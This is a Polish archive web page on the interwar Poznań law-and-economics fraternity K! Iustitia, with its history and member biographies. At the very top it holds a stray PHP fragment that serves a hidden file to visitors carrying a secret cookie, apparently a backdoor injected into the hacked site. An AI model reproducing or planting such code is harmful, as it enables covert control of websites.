if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Iustitia

Dekiel Franciszka Nogi Nazwa:
Korporacja Prawników i Ekonomistów Uniwersytetu Poznańskiego Iustitia
Siedziba:
Poznań
Data powstania:
23 V 1932 r.
Barwy:
niebieska - złota - zielona
Dewiza:
„Pro Patria et Iustitia” (”Dla Ojczyzny i Sprawiedliwości”)

Rys historyczny

Herb Iustitii, lata 30-te

Iustitia została założona dnia 23 V 1932 r. przez sześciu studentów Wydziału Prawno-Ekonomicznego UP, byłych członków K! Palestria. Inspiratorem odejścia z Palestri i stworzenia konkurencyjnej korporacji akademickiej łączącej słuchaczy prawa i ekonomii był Bolesław Tyc. Przyczyną rozłamu miał być sprzeciw wobec zaangażowania politycznego Palestrii w działalność organizacji konserwatywnych piłsudczyków Myśl Mocarstwowa.

Dnia 10 III 1933 r. Senat Uniwersytetu zatwierdził statut nowej korporacji. Kuratorem z ramienia Uniwersytetu został prof. Józef Bossowski.

Telegram ślubny od Iustitii.

Iustitia, podobnie jak Palestria, z której się wyłoniła, była typową korporacją wydziałową i skupiała wyłącznie studentów Wydziału Prawno-Ekonomicznego. Należała do korporacji sanacyjnych. Kandydowała pod opieką K! Sigismundia. Działała do II wojny światowej.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 33 nazwiska.

Brak wiadomości o działalności korporacji i spotkaniach członków w latach powojennych.

Lista członków

Poniższa, niekompletna lista członków Iustitii obejmuje ponad 30 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

 1. Paweł Aszyk, skarbnik sem. let. 1936/37, wiceprezes sem. zim. i sem. let. 1937/38, prezes sem. let. 1938/39
 2. Witold Bednarkiewicz, sekretarz sem. zim. 1939/40 (ostatnie Prezydium przed wojną)
 3. Alfons Bielicki, skarbnik sem. zim. 1936/37
 4. Kazimierz Brzykey (?), sekretarz sem. zim. i sem. let. 1936/37
 5. Anastazy Ewertowski, sem. zim. oraz sem. let. 1935/36
 6. Tadeusz Górecki, wiceprezes sem. let. 1938/39
 7. Jan Kanty Grzęski, skarbnik sem. zim. 1939/40 (ostatnie Prezydium przed wojną)

  Leon Hendrykowski, druga poł. lat 30.

 8. Leon Hendrykowski, (15 lipca 1912 w Mieleszówce -15 października 1977 w Ostrzeszowie) s. Jana (restauratora) i Katarzyny z Piaseckich, absolwent Koedukacyjnego Gimnazjum Humanistycznego (Towarzystwa Salezjańskiego) w Ostrzeszowie 1933, odbył kurs podchorążych rezerwy w Szczypiornie 1933/34, student i absolwent prawa UP 1935-39, w wojnie obronnej jako ppor. rez. dowódca plutonu c.k.m. 60 pułku piechoty Armii Poznań, walczył w bitwach pod Uniejowem, Łęczycą, nad Bzurą, w Puszczy Kampinowskiej. po kapitulacji Warszawy dostał się do niewoli, więziony do wyzwolenia w oflagach Prenzlau, Neubrandenburg Gross Born oraz stalagu Sandbostel, w oflagu Gross Born ukończył aplikację sądową 1944, po wojnie prokurator i adwokat w Ostrzeszowie i Krotoszynie, radny Rady Miejskiej Rady Narodowej w Krotoszynie, aktywny w strukturach zawodowych ZPP i ZBOWiD, odznaczony Medalem za Warszawę i Medalem “Za udział w wojnie obronnej 1939″, zginął w wypadku samochodowym, pochowany na Cmentarzu w Ostrzeszowie [Źródła (poza wskazanymi poniżej spisu członków): relacja syna Wojciecha Hendrykowskiego]

 9. Wiktor Jaśkiewicz, (1 kwietnia 1912 w Suwałkach - 24 października 2003 w Poznaniu) s. Jana i Agaty z d. Wysocka, absolwent Gimnazjum w Suwałkach, student i absolwent 1935 prawa UP, wiceprezes sem. let. 1933/34, kierownik referatu w Urzędzie Wojewódzkim w Poznaniu 1938-39 i 1945, w wojnie obronnej 1939 w 14 dywizjonie artylerii ciężkiej, dowódca plutonu w 2 baterii haubic, w czasie okupacji w Kozłówce 1941-43, prowadził tajne komplety, po wojnie dyrektor Gabinetu Ministra w Ministerstwie Ziem Odzyskanych w Warszawie, wojewoda olsztyński 1947-48, dyrektor administracyjny UP 1949, pracownik naukowy UAM, prorektor ds. nauczania 1951-55 i prorektor ds. ogólnych UAM 1955-56, od 1955 kierownik Katedry Prawa Pracy UAM, dziekan na Wyższej Szkole Ekonomicznej w Poznaniu 1961-63, dyrektor Instytutu Administracji i Zarządzania 1974-82, od 1982 na emeryturze, wykładowca w Katedrze Prawa Zespołowego Uniwersytetu w Białymstoku 1988-94, pochowany na Cmentarz Parfialnym przy ul. Lutyckiej w Poznaniu
 10. Witold Kamiński, I wiceprezes sem. zim. 1933/34
 11. Józef Kasznia, (maj 1909 - ) student prawa UP, żołnierz AK, prokurator, potem sędzia i adwokat,
 12. Edward Kawicki, sekretarz sem. zim. oraz sem. let. 1935/36
 13. Leon Łustacz, (1 lutego 1914 w Sankt Petersburgu - 25 sierpnia 1992 w Warszawie) absolwent prawa UP 1936, asystent w Katedrze Teorii Prawa UP 1937-39, równocześnie pracownik Biura Prawnego DOKP, w czasie wojny zesłany do Kazachstanu, od 1943 żołnierz Armii Czerwonej, a następnie LWP, m.in. od końca wojny zastępca szefa Zarządu Politycznego WP, od 1949 szef Fakultetu Wojskowo-Prawniczego Wojskowej Akademii Politycznej, od 1956 szef zarządu sądownictwa wojskowego, organizator 1961 i kierownik Wojskowego Insytutu Prawniczego, red. naczelny Wojskowego Przeglądu Prawniczego, przewodniczący Związku Inwalidów Wojennych, od 1950 praconik Wydziału Prawa UW, dr praw 1959, habilitacja 1968, prof. 1982, pionier badń w zakresie prawa ochrony środowiska
 14. Feliks Maciejewski (?), sekretarz sem. zim. i sem. let. 1937/38
 15. Maksymilian Maciejewski, wiceprezes sem. zim. i sem. let. 1936/37
 16. Franciszek Noga, (1912-1992)
 17. Stefan Nowakowski, prezes sem. zim. i sem. let. 1936/37
 18. Benedykt Ossowski, wiceprezes sem. zim. 1939/40 (ostatnie Prezydium przed wojną)
 19. Franciszek Piotrowicz, założyciel Iustitii
 20. Tadeusz Rolnicki (Rólnicki), skarbnik sem. let. 1938/39, olderman sem. zim. 1939/40 (ostatnie Prezydium przed wojną)
 21. Alfons Raszeja,
 22. Guntram Rolbiecki, ( - styczeń 1943 w Poznaniu) dr, asystent w Zakładzie Historii Gospodarczej na Wydziale Prawno-Ekonomicznym UP, zamordowany w Forcie VII przez Niemców
 23. Edmund Rygielski, sekretarz sem. zim. 1933/34, prezes sem. zim. oraz sem. let. 1935/36
 24. Bronisław Sas-Jaworski, (15 sierpnia 1915 w Kotor-Varoš w Bośni - 23 września 1939 w miejsc. Antonówka w gminie Krynice) s. Bronisława i Marii z Korab-Kowalskich, do 1919 rodzina przebywała w Bośni i Hercegowinie, a następnie przeniosła się do Lwowa, później Kołomyi, a w końcu do Stargardu Gdańskiego, absolwent Państwowego Gimnazjum Klasycznego w Starogardzie Gdańskim 1924-34, odbył służbę wojskową w 2 Kompanii Szkolnej CKM w Szkole Podchorążych Rezerwy Piechoty w Zambrowie 1934-35, ppor. rez. 1938, otrzymał przydział do 2 Batalionu Strzelców w Tczewie, członek Związku Oficerów Rezerwy, student i absolwent 1939 prawa UP (mgr praw), c. 1935, odznaczony Państwową Odznaką Sportową 1934 oraz Odznaką Pamiątkową 2 Batalionu Strzelców, w wojnie obronnej 1939 dowódca plutonu w 3 Dywizji Piechoty Legionów w bitwie pod Tomaszowem Lubelskim, gdzie poległ we wsi Antonówka (gmina Krynice), pochowany na cmentarzu wojennym [Źródła (poza wskazanymi poniżej spisu członków): relacja Andrzeja Sas-Jaworskiego]
 25. Stanisław Sroka, założyciel Iustitii, pierwszy olderman sem. let. 1931/32
 26. Józef Stawny, (6 marca 1905 w Daniszynie - zm. w Ostrowie Wlkp.), absolwent Gimnazjum w Ostrowie, II wiceprezes sem. zim. 1933/34, historyk, prawnik, adwokat, pochowany w Ostrowie

  Kazimierz Stekiel, prawd. 1939 r.

 27. Kazimierz Stekiel, (7 stycznia 1916 w Piotrówce w pow. kempińskim - 1940 w Charkowie) s. Walentego (właściciela folwarku w Piotrówce) i Jadwigi z d. Fabisz, abolswent gimnazjum w Kępnie, student prawa UP 1936-39, skarbnik sem. zim. i sem. let. 1937/38, sekretarz sem. let. 1938/39, prezes sem. zim. 1939/40 (ostatnie Prezydium przed wojną), abolwent Szkoły Podchorążych Rezerwy Piechoty (70 Pułk Piechoty), zamordowany przez NKWD wiosną 1940 (tzw. lista katyńska nr 1141) [Źródła (poza wskazanymi poniżej spisu członków): relacja Anny Czajkowskiej]

  Bolesław Tyc, 1928 r.

 28. Bolesław Tyc, (16 września 1908 w Radłowei w pow. ostrowskim w woj. poznańskim - 6 października 1999 w Łodzi) s. Franciszka i Marianny z d. Szkudlarz, absolwent Gimnazjum Klasycznego w Kępnie, twórca i prezes gimnazjalnego klubu Concordia, drużynowy Drużyny Harcerskiej im. Tadeusza Kościuszki, student i absolwent prawa UJ 1929-33, c. 1932 (?) Palestria, inicjator i założyciel Iustitii, pierwszy prezes sem. let. 1931/32, prezes Konwentu Filistrów 1937/38, po studiach referendarz w Starostwie Powiatowym we Włodzimierzu Wołyńskim, w czasie okupacji prowadził z bratem sklep w Lublinie, po 1945 adwokat w Poznaniu, Katowicach, Łodzi i Sochaczewie, w latach 40-tych działacz Stronnictwa Ludowego

 29. Zdzisław Twardowski , c. 1930 Baltia, później założyciel Iustitii, pierwszy sekretarz sem. let. 1931/32, prezes sem. zim. i sem. let. 1937/38
 30. Węglarz,
 31. Joachim Wróż,
 32. Jerzy Zawadzki, założyciel Iustitii, pierwszy wiceprezes sem. let. 1931/32, prezes sem. zim. 1933/34
 33. Stanisław Zakrzewski, (zm. 1939-1945), założyciel Iustitii, pierwszy skarbnik sem. let. 1931/32, skarbnik sem. zim. 1933/34, sem. zim. oraz sem. let. 1935/36

Pieczęć Iustitii, 1932 r.

Listę członków opracowano na podstawie:

1) materiałów archiwalnych z Archiwum UAM,
2) Krzysztof Krasowski, Wydział Prawno-Ekonomiczny Uniwersytetu Poznańskiego w latach 1919-1939, Poznań 2006,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) danych encyklopedycznych i słownikowych oraz rozmów z rodzinami zmarłych członków Iustitii.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2009 r.
Ostatnia zmiana: 30 IV 2018 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Prawników i Ekonomistów Uniwersytetu Poznańskiego Iustitia, (na:) www.archiwumkorporacyjne.pl, stan 30 IV 2018 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }